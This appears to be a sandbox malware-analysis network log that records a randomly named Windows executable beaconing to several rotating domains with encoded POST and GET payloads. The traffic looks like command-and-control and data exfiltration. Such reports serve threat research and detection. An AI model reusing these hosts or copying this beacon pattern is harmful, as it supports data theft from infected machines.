                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Ascii: oz=ThgGZIXTrmN386iLyQc3jgT0K0wVWNobOMiAcaDdzzZE4PF29t5xNOtzS961jUS1CCDt4BmZlrxdRTo+PzA9ZJg7knYrC7xQAxCQrDJQoyVZGIciffmM3/Y3jM5yfvRGDVUYoDgcWdkxduFnIbsT2PZzpPNCgrSQcQvVv9u5jumFAgnVEBC2UQcxt1FiS1GWEPOjLO9F8NdFbiNdb/1aiFs=
                                                                                                                                              Oct 4, 2024 08:08:30.383661985 CEST | 302 | IN | HTTP/1.1 404 Not Found
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Fri, 04 Oct 2024 06:08:30 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Content-Length: 138
                                                                                                                                              Connection: close
                                                                                                                                              ETag: "66b1b463-8a"
                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                              24 | 192.168.11.20 | 49754 | 38.47.207.146 | 80 | 4180 | C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                                              Oct 4, 2024 08:08:32.904025078 CEST | 2578 | OUT | POST /qjs8/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.typ67.top
                                                                                                                                              Origin: http://www.typ67.top
                                                                                                                                              Referer: http://www.typ67.top/qjs8/
                                                                                                                                              Content-Length: 7367
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Oct 4, 2024 08:08:33.205120087 CEST | 302 | IN | HTTP/1.1 404 Not Found
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Fri, 04 Oct 2024 06:08:33 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Content-Length: 138
                                                                                                                                              Connection: close
                                                                                                                                              ETag: "66b1b463-8a"
                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.11.20 | 49755 | 38.47.207.146 | 80 | 4180 | C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 08:08:35.743563890 CEST | 544 | OUT | GET /qjs8/?oz=ejIma/W1pGRFx7ChnTgroDHkNn1VdqZgcszQV8LCwj4556o206I/YZ5OId3qzm2jECDslwuStodYNwU7Ng5KBO4as1dQdJVJJimzghFMohwqM9lhe6W/0oM=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.typ67.top
                                                                                                                                              Connection: close
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
Oct 4, 2024 08:08:36.133718967 CEST | 302 | IN | HTTP/1.1 404 Not Found
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Fri, 04 Oct 2024 06:08:35 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Content-Length: 138
                                                                                                                                              Connection: close
                                                                                                                                              ETag: "66b1b463-8a"
                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.11.20 | 49756 | 3.33.130.190 | 80 | 4180 | C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 08:08:41.435738087 CEST | 813 | OUT | POST /phvf/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.greekhause.org
                                                                                                                                              Origin: http://www.greekhause.org
                                                                                                                                              Referer: http://www.greekhause.org/phvf/
                                                                                                                                              Content-Length: 199
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Ascii: oz=ZqAKhjHDqXd5rQXLnXFEuYJA4ecwdN+aGP0Z1NsdFstLRedRcBDb8CrbAkjunBzyH6Gl/pbnFSkJQWYCbdvtvI0Y3ISQdRvHkyb4xIIyyNsy1RkFoFXGSb1oc3fpnfyhKuXo7lAL2DqfIU1WmF1tD6XZJe8kQDVx1IwBPfAaWiHoUUXcYnmjskdQ7WVxOji1Ug==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.11.20 | 49757 | 3.33.130.190 | 80 | 4180 | C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 08:08:44.070035934 CEST | 833 | OUT | POST /phvf/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.greekhause.org
                                                                                                                                              Origin: http://www.greekhause.org
                                                                                                                                              Referer: http://www.greekhause.org/phvf/
                                                                                                                                              Content-Length: 219
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Ascii: oz=ZqAKhjHDqXd55j/LhwRE/4JP0+cwWt+eGP4Z1J9QF5FLQ+tRdD7b7CrbLEjrjBzpH6LY/o3nFSAJQXICauXu9o0a9YSOZRvHkyb4xINZyNky1gUFpg6Qe71rb3fp0PylKuW/7kMh2ACfIRJW301uaKXfNe9schMZy4cvEPExTBKTRCGGFVSHv3Bi/msZMhjuJoEJ+6nRutvzdJyQqU/FU10=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.11.20 | 49758 | 3.33.130.190 | 80 | 4180 | C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 08:08:46.709666014 CEST | 3867 | OUT | POST /phvf/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.greekhause.org
                                                                                                                                              Origin: http://www.greekhause.org
                                                                                                                                              Referer: http://www.greekhause.org/phvf/
                                                                                                                                              Content-Length: 7367
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
Oct 4, 2024 08:08:46.709712982 CEST | 4115 | OUT


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.11.20 | 49759 | 3.33.130.190 | 80 | 4180 | C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 08:08:49.347965002 CEST | 549 | OUT | GET /phvf/?oz=UooqiU+uiXRphlexxihY8+pR2p1qSaCGRsMigt4MGpA/VKVyXkL8qyeifVWI1Qf9IbKjjaT+NB40EHI1csOw8bEH8rv5XgPpsHil2J4w5MJOwgpAt1bCRv0=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.greekhause.org
                                                                                                                                              Connection: close
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
Oct 4, 2024 08:08:49.454838991 CEST | 399 | IN | HTTP/1.1 200 OK
                                                                                                                                              Server: openresty
                                                                                                                                              Date: Fri, 04 Oct 2024 06:08:49 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Content-Length: 259
                                                                                                                                              Connection: close
                                                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?oz=UooqiU+uiXRphlexxihY8+pR2p1qSaCGRsMigt4MGpA/VKVyXkL8qyeifVWI1Qf9IbKjjaT+NB40EHI1csOw8bEH8rv5XgPpsHil2J4w5MJOwgpAt1bCRv0=&UJ9=qN-llTKPHxntPrv0"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.11.20 | 49760 | 162.213.249.216 | 80 | 4180 | C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 08:08:54.777276039 CEST | 813 | OUT | POST /d84b/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.dorikis.online
                                                                                                                                              Origin: http://www.dorikis.online
                                                                                                                                              Referer: http://www.dorikis.online/d84b/
                                                                                                                                              Content-Length: 199
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Ascii: oz=GBk3MDGQZQHC6hP4CImWDunyGq0MtLj5r49NIEvxY6+ppDJ7Ex20C9UUbqFvOvsBRTEQDdSEZFaBAMxq+YKMBCShgPoFjAFYGiPvYkMT0FzpyEXt9l1vHV4ycYsrPGONqhtwC7FP1Ayv6HeShq57Aa90zODgv8C5pQgQhe2c8N2/joFmCdhB0Qdqej8WwHTrZw==
Oct 4, 2024 08:08:54.961083889 CEST | 595 | IN | HTTP/1.1 404 Not Found
                                                                                                                                              Date: Fri, 04 Oct 2024 06:08:54 GMT
                                                                                                                                              Server: Apache
                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                              Content-Length: 389
                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.11.20 | 49761 | 162.213.249.216 | 80 | 4180 | C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 08:08:57.472019911 CEST | 833 | OUT | POST /d84b/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.dorikis.online
                                                                                                                                              Origin: http://www.dorikis.online
                                                                                                                                              Referer: http://www.dorikis.online/d84b/
                                                                                                                                              Content-Length: 219
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Ascii: oz=GBk3MDGQZQHC4Bf4BreWS+n1JK0M6bj9r4xNIGDbYPOpnC57FzS0H9UUPaFmRfsaRT5tDfWEZFOBAI1q+pKNTiTH1foDtgFYGiPvYnw50FLpz1ntswVoL141bYsrLGOBqhsVC5xp1Cav6FGShb58Oa89/eDwicbVoTotwO3P6+qWm+U8fvVl3DBYaTF+yFSwE7+XOCxe+DhfScN8sdYSArI=
                                                                                                                                              Oct 4, 2024 08:08:57.660258055 CEST | 595 | IN | HTTP/1.1 404 Not Found
                                                                                                                                              Date: Fri, 04 Oct 2024 06:08:57 GMT
                                                                                                                                              Server: Apache
                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                              Content-Length: 389
                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                              32 | 192.168.11.20 | 49762 | 162.213.249.216 | 80 | 4180 | C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                                              Oct 4, 2024 08:09:00.159516096 CEST | 2578 | OUT | POST /d84b/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.dorikis.online
                                                                                                                                              Origin: http://www.dorikis.online
                                                                                                                                              Referer: http://www.dorikis.online/d84b/
                                                                                                                                              Content-Length: 7367
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Oct 4, 2024 08:09:00.159600019 CEST | 5404 | OUT |
                                                                                                                                              Data Ascii: DC5dKikiP/A+n3Jbr/mmbfU/N9ZvBn7rvZzIxYXDUa000MB865fAPpPuYOT989Iybx9Dn9pEU/xncM+b1rAc1eAW2pwzC+vtYeyL9iiH47zyd6AsXVWBbbsGJmeDvH/zTcFMFZPoYdhQhjo06/7ndBMkokyu3uZSkDecSuGA+LlZQlGw4NUZ9rQjFelS4vSfbhcRyrEa0N0LBSIcxC0B5GO8o2O6xZno0U/qj/pxyLOJ8m18Uko
                                                                                                                                              Oct 4, 2024 08:09:00.342919111 CEST | 595 | IN | HTTP/1.1 404 Not Found
                                                                                                                                              Date: Fri, 04 Oct 2024 06:09:00 GMT
                                                                                                                                              Server: Apache
                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                              Content-Length: 389
                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                              33 | 192.168.11.20 | 49763 | 162.213.249.216 | 80 | 4180 | C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                                              Oct 4, 2024 08:09:02.859702110 CEST | 549 | OUT | GET /d84b/?oz=LDMXP2ida3jj6Wv8YbWYWcXQGJdr9fjlzYlCdzHaAPX6jElzFVuifqg0YZMPIM8JGTBjffDneHOFDPAe46iMAyLvyO9+lRB2GxTtOnRawDOQ6U7+wx9GICg=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.dorikis.online
                                                                                                                                              Connection: close
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Oct 4, 2024 08:09:03.074490070 CEST | 610 | IN | HTTP/1.1 404 Not Found
                                                                                                                                              Date: Fri, 04 Oct 2024 06:09:02 GMT
                                                                                                                                              Server: Apache
                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                              Content-Length: 389
                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                              34 | 192.168.11.20 | 49764 | 3.33.130.190 | 80 | 4180 | C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                                              Oct 4, 2024 08:09:08.295380116 CEST | 834 | OUT | POST /qo4k/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.platinumkitchens.info
                                                                                                                                              Origin: http://www.platinumkitchens.info
                                                                                                                                              Referer: http://www.platinumkitchens.info/qo4k/
                                                                                                                                              Content-Length: 199
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Ascii: oz=64iNzW8jYbN7359wUIue3V8an27/vFbfgjwVhWbz70cR2PZcBJzuhYFhhwamA2IohGjWBVRUvU4zk98htgogDUrFeDEB0hPfoe3L9qYa+wUqt6V4WWFnlPoZyhRVk5MOQBo9sFO7vpp+wST9VbH/EQA2YjyXP7tWBuAuXUW9B4YciYSg8XEHQG+FT/liJ/0WvQ==


                                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                              35 | 192.168.11.20 | 49765 | 3.33.130.190 | 80 | 4180 | C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                                              Oct 4, 2024 08:09:10.923429966 CEST | 854 | OUT | POST /qo4k/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.platinumkitchens.info
                                                                                                                                              Origin: http://www.platinumkitchens.info
                                                                                                                                              Referer: http://www.platinumkitchens.info/qo4k/
                                                                                                                                              Content-Length: 219
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Ascii: oz=64iNzW8jYbN72YNwXv6e118FpW7/6Vblgj8VhT7j6GoR2vpcAMPus4FhmAbsNWIZhHepBUtUvVczk4Aht38/MkrHHzED7BPfoe3L9u08+wMqtKl4V3F4vvoa1hRVzpMKQBolsBPWvtZ+wTj9Vuz4NQAKXDzzMINcKMoPSWGRNqw+jOD6hlwjTVi3XPcKL91NyfNSjZ5+Boc5ZYli7Skv6pc=


                                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                              36 | 192.168.11.20 | 49766 | 3.33.130.190 | 80 | 4180 | C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                                              Oct 4, 2024 08:09:13.562974930 CEST | 1289 | OUT | POST /qo4k/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.platinumkitchens.info
                                                                                                                                              Origin: http://www.platinumkitchens.info
                                                                                                                                              Referer: http://www.platinumkitchens.info/qo4k/
                                                                                                                                              Content-Length: 7367
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.11.20 | 49767 | 3.33.130.190 | 80 | 4180 | C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 08:09:16.201267004 CEST | 556 | OUT | GET /qo4k/?oz=36KtwjIDafomy9tqOdqNwmsTn0KS8yDqwBoT0TnhmWNBmrcWA57j581r3y6lS3Ypxl7bXHdk4WhS3KsNzHZbX1L1UxoK9zL5luuQrcJM9iAor4hALAJtoKM=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.platinumkitchens.info
                                                                                                                                              Connection: close
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
Oct 4, 2024 08:09:16.303719997 CEST | 399 | IN | HTTP/1.1 200 OK
                                                                                                                                              Server: openresty
                                                                                                                                              Date: Fri, 04 Oct 2024 06:09:16 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Content-Length: 259
                                                                                                                                              Connection: close
                                                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?oz=36KtwjIDafomy9tqOdqNwmsTn0KS8yDqwBoT0TnhmWNBmrcWA57j581r3y6lS3Ypxl7bXHdk4WhS3KsNzHZbX1L1UxoK9zL5luuQrcJM9iAor4hALAJtoKM=&UJ9=qN-llTKPHxntPrv0"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.11.20 | 49768 | 3.33.130.190 | 80 | 4180 | C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 08:09:21.528614044 CEST | 801 | OUT | POST /yyvd/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.dhkatp.vip
                                                                                                                                              Origin: http://www.dhkatp.vip
                                                                                                                                              Referer: http://www.dhkatp.vip/yyvd/
                                                                                                                                              Content-Length: 199
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Ascii: oz=Ao0pCCEh0VO3HyU7fB/ziGJQ7udX8+kc8nJy2Lb733to7pUp291ZmCICl6uEKaBqdGybY3seJgyfWHpj95lXNb9w+fl6DzNKf8kfhgYCfFZaGy1haSA3ktaho/y44KCYkGAJ1S0cs8HkTlOLXqSD3+TDtaUftySdy0sk+TfHHbPq9yu/LqiMYzlWah14j5Tj4w==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
